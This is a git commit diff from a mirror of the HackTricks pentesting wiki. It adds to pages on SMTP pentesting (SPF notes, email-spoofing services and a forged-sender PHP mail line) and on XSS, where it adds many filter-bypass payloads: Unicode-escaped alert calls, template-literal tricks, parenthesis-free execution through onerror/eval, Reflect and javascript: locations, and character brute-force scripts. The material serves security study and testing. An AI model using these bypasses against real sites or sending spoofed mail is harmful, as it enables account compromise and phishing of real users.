mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
GITBOOK-3770: No subject
This commit is contained in:
parent
a589831b67
commit
6456c7762e
4 changed files with 248 additions and 120 deletions
|
@ -577,7 +577,7 @@
|
|||
* [Dom Clobbering](pentesting-web/xss-cross-site-scripting/dom-clobbering.md)
|
||||
* [DOM XSS](pentesting-web/xss-cross-site-scripting/dom-xss.md)
|
||||
* [Iframes in XSS, CSP and SOP](pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md)
|
||||
* [Other JS Tricks](pentesting-web/xss-cross-site-scripting/other-js-tricks.md)
|
||||
* [Misc JS Tricks & Relevant Info](pentesting-web/xss-cross-site-scripting/other-js-tricks.md)
|
||||
* [PDF Injection](pentesting-web/xss-cross-site-scripting/pdf-injection.md)
|
||||
* [Server Side XSS (Dynamic PDF)](pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
|
||||
* [SOME - Same Origin Method Execution](pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md)
|
||||
|
|
|
@ -2,13 +2,13 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -266,6 +266,11 @@ A **complete guide of these countermeasures** can be found in [https://seanthege
|
|||
|
||||
### SPF
|
||||
|
||||
{% hint style="danger" %}
|
||||
SPF [was "deprecated" in 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). This means that instead of creating a **TXT record** in `_spf.domain.com` you create it in `domain.com` using the **same syntax**.\
|
||||
Moreover, to reuse previous spf records it's quiet common to find something like `"v=spf1 include:_spf.google.com ~all"`
|
||||
{% endhint %}
|
||||
|
||||
**Sender Policy Framework** (SPF) provides a mechanism that allows MTAs to check if a host sending an email is authorized.\
|
||||
Then, the organisations can define a list of authorised mail servers and the MTAs can query for this lists to check if the email was spoofed or not.\
|
||||
In order to define IP addresses/ranges, domains and others that are **allowed to send email on behalf a domain name**, different "**Mechanism**" cam appear in the SPF registry.
|
||||
|
@ -405,12 +410,12 @@ nmap -p25 --script smtp-open-relay 10.10.10.10 -v
|
|||
### Send Spoof Email
|
||||
|
||||
* [**https://www.mailsploit.com/index**](https://www.mailsploit.com/index)
|
||||
* ****[**http://www.anonymailer.net/**](http://www.anonymailer.net)****
|
||||
* [**https://emkei.cz/**](https://emkei.cz/)****
|
||||
* [**http://www.anonymailer.net/**](http://www.anonymailer.net)
|
||||
* [**https://emkei.cz/**](https://emkei.cz/)\*\*\*\*
|
||||
|
||||
**Or you could use a tool:**
|
||||
|
||||
* [**https://github.com/magichk/magicspoofing**](https://github.com/magichk/magicspoofing)****
|
||||
* [**https://github.com/magichk/magicspoofing**](https://github.com/magichk/magicspoofing)\*\*\*\*
|
||||
|
||||
```bash
|
||||
# This will send a test email from test@victim.com to destination@gmail.com
|
||||
|
@ -447,7 +452,8 @@ K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
|
|||
{% tabs %}
|
||||
{% tab title="PHP" %}
|
||||
<pre class="language-php"><code class="lang-php"><strong># This will send an unsigned message
|
||||
</strong><strong>mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");</strong></code></pre>
|
||||
</strong><strong>mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");
|
||||
</strong></code></pre>
|
||||
{% endtab %}
|
||||
|
||||
{% tab title="Python" %}
|
||||
|
@ -596,12 +602,12 @@ Entry_8:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,18 +1,6 @@
|
|||
# XSS (Cross Site Scripting)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">
|
||||
 /<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">
|
||||
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
|
@ -87,6 +75,13 @@ In this case your input is reflected between **`<script> [...] </script>`** tags
|
|||
* `';-alert(1)//`
|
||||
* `\';alert(1)//`
|
||||
* If reflected inside template literals you can **embed JS expressions** using `${ ... }` syntax: `` var greetings = `Hello, ${alert(1)}` ``
|
||||
* **Unicode encode** works to write **valid javascript code**:
|
||||
|
||||
```javascript
|
||||
\u{61}lert(1)
|
||||
\u0061lert(1)
|
||||
\u{0061}lert(1)
|
||||
```
|
||||
|
||||
#### Javascript Hoisting
|
||||
|
||||
|
@ -496,7 +491,13 @@ T**he XSS payload will be something like this: `" accesskey="x" onclick="alert(1
|
|||
|
||||
### Blacklist Bypasses
|
||||
|
||||
Several tricks with using different encoding were exposed already inside this section. Go **back to learn where can you use HTML encoding, Unicode encoding, URL encoding, Hex and Octal encoding and even data encoding**.
|
||||
Several tricks with using different encoding were exposed already inside this section. Go **back to learn where can you use:**
|
||||
|
||||
* **HTML encoding (HTML tags)**
|
||||
* **Unicode encoding (can be valid JS code):** `\u0061lert(1)`
|
||||
* **URL encoding**
|
||||
* **Hex and Octal encoding**
|
||||
* **data encoding**
|
||||
|
||||
**Bypasses for HTML tags and attributes**
|
||||
|
||||
|
@ -555,7 +556,18 @@ If `<>` are being sanitised you can still **escape the string** where your input
|
|||
In order to construct **strings** apart from single and double quotes JS also accepts **backticks** **` `` `** . This is known as template literals as they allow to **embedded JS expressions** using `${ ... }` syntax.\
|
||||
Therefore, if you find that your input is being **reflected** inside a JS string that is using backticks, you can abuse the syntax `${ ... }` to execute **arbitrary JS code**:
|
||||
|
||||
This can be **abused** using: `${alert(1)}`
|
||||
This can be **abused** using:
|
||||
|
||||
```javascript
|
||||
`${alert(1)}`
|
||||
`${`${`${`${alert(1)}`}`}`}`
|
||||
```
|
||||
|
||||
```````````````javascript
|
||||
// This is valid JS code, because each time the function returns itself it's recalled with ``
|
||||
function loop(){return loop}
|
||||
loop``````````````
|
||||
```````````````
|
||||
|
||||
### Encoded code execution
|
||||
|
||||
|
@ -566,6 +578,14 @@ This can be **abused** using: `${alert(1)}`
|
|||
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">
|
||||
```
|
||||
|
||||
### Unicode Encode JS execution
|
||||
|
||||
```javascript
|
||||
\u{61}lert(1)
|
||||
\u0061lert(1)
|
||||
\u{0061}lert(1)
|
||||
```
|
||||
|
||||
### JavaScript bypass blacklists techniques
|
||||
|
||||
**Strings**
|
||||
|
@ -576,6 +596,7 @@ This can be **abused** using: `${alert(1)}`
|
|||
`thisisastring`
|
||||
/thisisastring/ == "/thisisastring/"
|
||||
/thisisastring/.source == "thisisastring"
|
||||
"\h\e\l\l\o"
|
||||
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
|
||||
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
|
||||
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
|
||||
|
@ -586,6 +607,22 @@ atob("dGhpc2lzYXN0cmluZw==")
|
|||
eval(8680439..toString(30))(983801..toString(36))
|
||||
```
|
||||
|
||||
**Special escapes**
|
||||
|
||||
```javascript
|
||||
'\b' //backspace
|
||||
'\f' //form feed
|
||||
'\n' //new line
|
||||
'\r' //carriage return
|
||||
'\t' //tab
|
||||
'\b' //backspace
|
||||
'\f' //form feed
|
||||
'\n' //new line
|
||||
'\r' //carriage return
|
||||
'\t' //tab
|
||||
// Any other char escaped is just itself
|
||||
```
|
||||
|
||||
**Space substitutions inside JS code**
|
||||
|
||||
```javascript
|
||||
|
@ -593,29 +630,6 @@ eval(8680439..toString(30))(983801..toString(36))
|
|||
/**/
|
||||
```
|
||||
|
||||
**JavaScript without parentheses**
|
||||
|
||||
````javascript
|
||||
alert`1`
|
||||
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
|
||||
eval.call`${'alert\x2823\x29'}`
|
||||
eval.apply`${[`alert\x2823\x29`]}`
|
||||
[].sort.call`${alert}1337`
|
||||
[].map.call`${eval}\\u{61}lert\x281337\x29`
|
||||
throw onerror=alert,1337
|
||||
Function`x${'alert\x281337\x29'}x```
|
||||
'alert\x281337\x29'instanceof{[Symbol['hasInstance']]:eval}
|
||||
valueOf=alert;window+''
|
||||
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
|
||||
// or any DOMXSS sink such as location=name
|
||||
|
||||
window.name='javascript:alert(1)'
|
||||
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
|
||||
````
|
||||
|
||||
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
|
||||
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
|
||||
|
||||
**JavaScript comments (from** [**JavaScript Comments**](./#javascript-comments) **trick)**
|
||||
|
||||
```javascript
|
||||
|
@ -635,6 +649,86 @@ String.fromCharCode(8232) //0xe2 0x80 0xa8
|
|||
String.fromCharCode(8233) //0xe2 0x80 0xa8
|
||||
```
|
||||
|
||||
**JavaScript without parentheses**
|
||||
|
||||
````javascript
|
||||
// By setting location
|
||||
window.location='javascript:alert\x281\x29'
|
||||
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
|
||||
// or any DOMXSS sink such as location=name
|
||||
|
||||
// Backtips
|
||||
// Backtips pass the string as an array of lenght 1
|
||||
alert`1`
|
||||
|
||||
// Backtips + Tagged Templates + call/apply
|
||||
eval`alert\x281\x29` // This won't work as it will just return the passed array
|
||||
setTimeout`alert\x281\x29`
|
||||
eval.call`${'alert\x281\x29'}`
|
||||
eval.apply`${[`alert\x281\x29`]}`
|
||||
[].sort.call`${alert}1337`
|
||||
[].map.call`${eval}\\u{61}lert\x281337\x29`
|
||||
|
||||
// To pass several arguments you can use
|
||||
function btt(){
|
||||
console.log(arguments);
|
||||
}
|
||||
btt`${'arg1'}${'arg2'}${'arg3'}`
|
||||
|
||||
//It's possible to construct a function and call it
|
||||
Function`x${'alert(1337)'}x```
|
||||
|
||||
// .replace can use regexes and call a function if something is found
|
||||
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
|
||||
"a".replace.call`1${/./}${alert}`
|
||||
// This happened in the previous example
|
||||
// Change "this" value of call to "1,"
|
||||
// match anything with regex /./
|
||||
// call alert with "1"
|
||||
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead
|
||||
|
||||
// Using Reflect.apply to call any function with any argumnets
|
||||
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
|
||||
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
|
||||
// Using Reflect.set to call set any value to a variable
|
||||
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.
|
||||
|
||||
|
||||
|
||||
// valueOf, toString
|
||||
// These operations are called when the object is used as a primitive
|
||||
// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
|
||||
valueOf=alert;window+''
|
||||
toString=alert;window+''
|
||||
|
||||
|
||||
// Error handler
|
||||
window.onerror=eval;throw"=alert\x281\x29";
|
||||
onerror=eval;throw"=alert\x281\x29";
|
||||
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
|
||||
{onerror=eval}throw"=alert(1)" //No ";"
|
||||
onerror=alert //No ";" using new line
|
||||
throw 1337
|
||||
// Error handler + Special unicode separators
|
||||
eval("onerror=\u2028alert\u2029throw 1337");
|
||||
// Error handler + Comma separator
|
||||
// The comma separator goes through the list and returns only the last element
|
||||
var a = (1,2,3,4,5,6) // a = 6
|
||||
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
|
||||
throw onerror=alert,1,1,1,1,1,1337
|
||||
// optional exception variables inside a catch clause.
|
||||
try{throw onerror=alert}catch{throw 1}
|
||||
|
||||
|
||||
// Has instance symbol
|
||||
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
|
||||
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
|
||||
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
|
||||
````
|
||||
|
||||
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
|
||||
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
|
||||
|
||||
**Arbitrary function (alert) call**
|
||||
|
||||
````javascript
|
||||
|
@ -1326,14 +1420,18 @@ alert("XSS");
|
|||
|
||||
Find **more SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
|
||||
|
||||
## Misc JS Tricks & Relevant Info
|
||||
|
||||
{% content-ref url="other-js-tricks.md" %}
|
||||
[other-js-tricks.md](other-js-tricks.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
## XSS resources
|
||||
|
||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)\
|
||||
|
||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)
|
||||
* [http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list) 
|
||||
* [https://github.com/ismailtasdelen/xss-payload-list](https://github.com/ismailtasdelen/xss-payload-list) 
|
||||
* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)\
|
||||
|
||||
* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
|
||||
* [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)
|
||||
|
||||
### XSS TOOLS
|
||||
|
|
|
@ -1,25 +1,20 @@
|
|||
|
||||
# Misc JS Tricks & Relevant Info
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong><a href="https://www.twitch.tv/hacktricks_live/schedule">🎙️ HackTricks LIVE Twitch</a> Wednesdays 5.30pm (UTC) 🎙️ - <a href="https://www.youtube.com/@hacktricks_LIVE">🎥 Youtube 🎥</a></strong></summary>
|
||||
<summary><a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ HackTricks LIVE Twitch</strong></a> <strong>Wednesdays 5.30pm (UTC) 🎙️ -</strong> <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
|
||||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
|
||||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
|
||||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
|
||||
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## Javascript Characters Brute-Force
|
||||
|
||||
# Javascript Characters Brute-Force
|
||||
|
||||
## JavaScript Comments BF
|
||||
### JavaScript Comments BF
|
||||
|
||||
```javascript
|
||||
//This is a 1 line comment
|
||||
|
@ -28,39 +23,39 @@
|
|||
-->This is a 1 line comment, but "-->" must to be at the beggining of the line
|
||||
|
||||
|
||||
for (let j = 0; j < 128; j++) {
|
||||
for (let k = 0; k < 128; k++) {
|
||||
for (let l = 0; l < 128; l++) {
|
||||
if (j == 34 || k ==34 || l ==34)
|
||||
continue;
|
||||
if (j == 0x0a || k ==0x0a || l ==0x0a)
|
||||
continue;
|
||||
if (j == 0x0d || k ==0x0d || l ==0x0d)
|
||||
continue;
|
||||
if (j == 0x3c || k ==0x3c || l ==0x3c)
|
||||
continue;
|
||||
if (
|
||||
(j == 47 && k == 47)
|
||||
||(k == 47 && l == 47)
|
||||
)
|
||||
continue;
|
||||
try {
|
||||
var cmd = String.fromCharCode(j) + String.fromCharCode(k) + String.fromCharCode(l) + 'a.orange.ctf"';
|
||||
eval(cmd);
|
||||
} catch(e) {
|
||||
var err = e.toString().split('\n')[0].split(':')[0];
|
||||
if (err === 'SyntaxError' || err === "ReferenceError")
|
||||
continue
|
||||
err = e.toString().split('\n')[0]
|
||||
}
|
||||
console.log(err,cmd);
|
||||
}
|
||||
}
|
||||
for (let j = 0; j < 128; j++) {
|
||||
for (let k = 0; k < 128; k++) {
|
||||
for (let l = 0; l < 128; l++) {
|
||||
if (j == 34 || k ==34 || l ==34)
|
||||
continue;
|
||||
if (j == 0x0a || k ==0x0a || l ==0x0a)
|
||||
continue;
|
||||
if (j == 0x0d || k ==0x0d || l ==0x0d)
|
||||
continue;
|
||||
if (j == 0x3c || k ==0x3c || l ==0x3c)
|
||||
continue;
|
||||
if (
|
||||
(j == 47 && k == 47)
|
||||
||(k == 47 && l == 47)
|
||||
)
|
||||
continue;
|
||||
try {
|
||||
var cmd = String.fromCharCode(j) + String.fromCharCode(k) + String.fromCharCode(l) + 'a.orange.ctf"';
|
||||
eval(cmd);
|
||||
} catch(e) {
|
||||
var err = e.toString().split('\n')[0].split(':')[0];
|
||||
if (err === 'SyntaxError' || err === "ReferenceError")
|
||||
continue
|
||||
err = e.toString().split('\n')[0]
|
||||
}
|
||||
//From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
|
||||
console.log(err,cmd);
|
||||
}
|
||||
}
|
||||
}
|
||||
//From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
|
||||
```
|
||||
|
||||
## Javascript New Lines BF
|
||||
### Javascript New Lines BF
|
||||
|
||||
```javascript
|
||||
//Javascript interpret as new line these chars:
|
||||
|
@ -69,7 +64,7 @@ String.fromCharCode(13) //0x0d
|
|||
String.fromCharCode(8232) //0xe2 0x80 0xa8
|
||||
String.fromCharCode(8233) //0xe2 0x80 0xa8
|
||||
|
||||
for (let j = 0; j < 65536; j++) {
|
||||
for (let j = 0; j < 65536; j++) {
|
||||
try {
|
||||
var cmd = '"aaaaa";'+String.fromCharCode(j) + '-->a.orange.ctf"';
|
||||
eval(cmd);
|
||||
|
@ -80,11 +75,11 @@ String.fromCharCode(8233) //0xe2 0x80 0xa8
|
|||
err = e.toString().split('\n')[0]
|
||||
}
|
||||
console.log(`[${err}]`,j,cmd);
|
||||
}
|
||||
}
|
||||
//From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
|
||||
```
|
||||
|
||||
## **Surrogate Pairs BF**
|
||||
### **Surrogate Pairs BF**
|
||||
|
||||
This technique won't be very useful for XSS but it could be useful to bypass WAF protections. This python code receive as input 2bytes and it search a surrogate pairs that have the first byte as the the last bytes of the High surrogate pair and the the last byte as the last byte of the low surrogate pair.
|
||||
|
||||
|
@ -104,22 +99,58 @@ More info:
|
|||
* [https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md](https://github.com/dreadlocked/ctf-writeups/blob/master/nn8ed/README.md)
|
||||
* [https://mathiasbynens.be/notes/javascript-unicode](https://mathiasbynens.be/notes/javascript-unicode) [https://mathiasbynens.be/notes/javascript-encoding](https://mathiasbynens.be/notes/javascript-encoding)
|
||||
|
||||
# **.map js files**
|
||||
## **.map js files**
|
||||
|
||||
* Trick to download .map js files: [https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7](https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7)
|
||||
* You can use this tool to analyze these files [https://github.com/paazmaya/shuji](https://github.com/paazmaya/shuji)
|
||||
|
||||
# "--" Assignment
|
||||
## "--" Assignment
|
||||
|
||||
The decrement operator `--` is also an asignment. This operator takes a value and then decrements it by one. If that value is not a number, it will be set to `NaN`. This can be used to **remove the content of variables from the environment**.
|
||||
The decrement operator `--` is also an asignment. This operator takes a value and then decrements it by one. If that value is not a number, it will be set to `NaN`. This can be used to **remove the content of variables from the environment**.
|
||||
|
||||
![](<../../.gitbook/assets/image (553).png>)
|
||||
|
||||
![](<../../.gitbook/assets/image (554).png>)
|
||||
|
||||
# Functions Tricks
|
||||
## Functions Tricks
|
||||
|
||||
## Arrow functions
|
||||
### .call and .apply
|
||||
|
||||
The **`.call`** method of a function is used to **run the function**.\
|
||||
The **first argument** it expects by default is the **value of `this`** and if **nothing** is provided, **`window`** will be that value (unless **`strict mode`** is used).
|
||||
|
||||
```javascript
|
||||
function test_call(){
|
||||
console.log(this.value); //baz
|
||||
}
|
||||
new_this={value:"hey!"}
|
||||
test_call.call(new_this);
|
||||
|
||||
// To pass more arguments, just pass then inside .call()
|
||||
function test_call() {
|
||||
console.log(arguments[0]); //"arg1"
|
||||
console.log(arguments[1]); //"arg2"
|
||||
console.log(this); //[object Window]
|
||||
}
|
||||
test_call.call(null, "arg1", "arg2")
|
||||
|
||||
// If you use the "use strict" directive "this" will be null instead of window:
|
||||
function test_call() {
|
||||
"use strict";
|
||||
console.log(this); //null
|
||||
}
|
||||
test_call.call(null)
|
||||
|
||||
//The apply function is pretty much exactly the same as the call function with one important difference, you can supply an array of arguments in the second argument:
|
||||
function test_apply() {
|
||||
console.log(arguments[0]); //"arg1"
|
||||
console.log(arguments[1]); //"arg2"
|
||||
console.log(this); //[object Window]
|
||||
}
|
||||
test_apply.apply(null, ["arg1", "arg2"])
|
||||
```
|
||||
|
||||
### Arrow functions
|
||||
|
||||
Arrow functions allow you to generate functions in a single line more easily (if you understand them)
|
||||
|
||||
|
@ -156,7 +187,7 @@ function plusone (a){ return a + 1; }
|
|||
plusone = a => a + 100;
|
||||
```
|
||||
|
||||
## Bind function
|
||||
### Bind function
|
||||
|
||||
The bind function allow to create a **copy** of a **function modifying** the **`this`** object and the **parameters** given.
|
||||
|
||||
|
@ -188,7 +219,7 @@ bindFn_change('Hello', 'World')
|
|||
Note that using **`bind`** you can manipulate the **`this`** object that is going to be used when calling the function.
|
||||
{% endhint %}
|
||||
|
||||
## Function code leak
|
||||
### Function code leak
|
||||
|
||||
If you can **access the object** of a function you can **get the code** of that function
|
||||
|
||||
|
@ -219,7 +250,7 @@ Some **random** ways to **extract the code** of a function (even comments) from
|
|||
(u=>_=>(String(u)))(_=>{ /* Hidden commment */ })()
|
||||
```
|
||||
|
||||
# Breakpoint on access to value
|
||||
## Breakpoint on access to value
|
||||
|
||||
```javascript
|
||||
// Stop when a property in sessionStorage or localStorage is set/get
|
||||
|
